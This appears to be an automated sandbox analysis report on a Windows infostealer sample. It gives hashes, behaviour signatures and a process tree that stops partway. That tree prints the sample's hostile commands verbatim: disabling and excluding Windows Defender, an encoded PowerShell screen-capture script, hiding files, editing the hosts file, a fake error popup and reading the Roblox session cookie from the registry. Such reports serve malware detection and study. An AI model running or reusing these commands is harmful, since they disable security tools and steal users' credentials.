Analysis

  • max time kernel
    93s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 05:42

General

  • Target

    40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe

  • Size

    7.8MB

  • MD5

    7387c25a54f0ddba2a8a37276e06630b

  • SHA1

    2f0c44f7de353f7ef4660ec036bca477edd7e000

  • SHA256

    40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8

  • SHA512

    e5205b51d6a720e2b92925ff4018f9c7e5f121668d27ef8cef4d812d5312d9934a76dfc4880c0845cba1d3b3c5a3c4c20d8a6ed9a174c7024a7f1960fe875e88

  • SSDEEP

    196608:0bgFShewfI9jUC2gYBYv3vbW5+iITm1U6f4:RFShVIH2gYBgDW4TOzw

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 27 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 21 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 30 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe
    "C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4200
    • C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe
      "C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4476
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2196
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c ipconfig /all
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Windows\system32\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:4448
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
            5⤵
              PID:2628
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                6⤵
                  PID:4336
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                  6⤵
                    PID:3704
                • C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
                  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\Admin\AppData\Local\Temp\bound.exe" --isUpdate true
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2588
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd" /c ipconfig /all
                    6⤵
                      PID:4840
                      • C:\Windows\system32\ipconfig.exe
                        ipconfig /all
                        7⤵
                        • Gathers network information
                        PID:1264
                    • C:\Windows\System32\msiexec.exe
                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
                      6⤵
                        PID:1436
                      • C:\ProgramData\Solara\Solara.exe
                        "C:\ProgramData\Solara\Solara.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3264
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Application failed to initialize (0xc0000135).', 0, 'CRITICAL ERROR', 0+16);close()""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1048
                  • C:\Windows\system32\mshta.exe
                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Application failed to initialize (0xc0000135).', 0, 'CRITICAL ERROR', 0+16);close()"
                    4⤵
                      PID:2260
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3508
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1436
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1740
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic csproduct get uuid
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:744
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4832
                    • C:\Windows\system32\reg.exe
                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                      4⤵
                        PID:4780
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2468
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        4⤵
                          PID:3724
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1492
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          4⤵
                          • Detects videocard installed
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2124
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2088
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          4⤵
                          • Detects videocard installed
                          PID:1524
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe""
                        3⤵
                        • Hide Artifacts: Hidden Files and Directories
                        • Suspicious use of WriteProcessMemory
                        PID:2012
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\40e57dd1849bcdd2949904428890b2e2e9a71db8d53a096252db25f49fa187c8.exe"
                          4⤵
                          • Views/modifies file attributes
                          PID:4880
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3800
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4580
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4804
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:1740
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        3⤵
                          PID:808
                          • C:\Windows\system32\tasklist.exe
                            tasklist /FO LIST
                            4⤵
                            • Enumerates processes with tasklist
                            PID:2236
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:3652
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:4336
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:1440
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4764
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afsdkbfj\afsdkbfj.cmdline"
                                    5⤵
                                      PID:4576
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB892.tmp" "c:\Users\Admin\AppData\Local\Temp\afsdkbfj\CSCDC551DAD260A40D7A1EEAA9176D3FC8E.TMP"
                                        6⤵
                                          PID:1264
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:4060
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:4832
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:1620
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1376
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:1888
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                          3⤵
                                            PID:208
                                            • C:\Windows\system32\tasklist.exe
                                              tasklist /FO LIST
                                              4⤵
                                              • Enumerates processes with tasklist
                                              PID:1248
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:3448
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4876
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              3⤵
                                                PID:4948
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
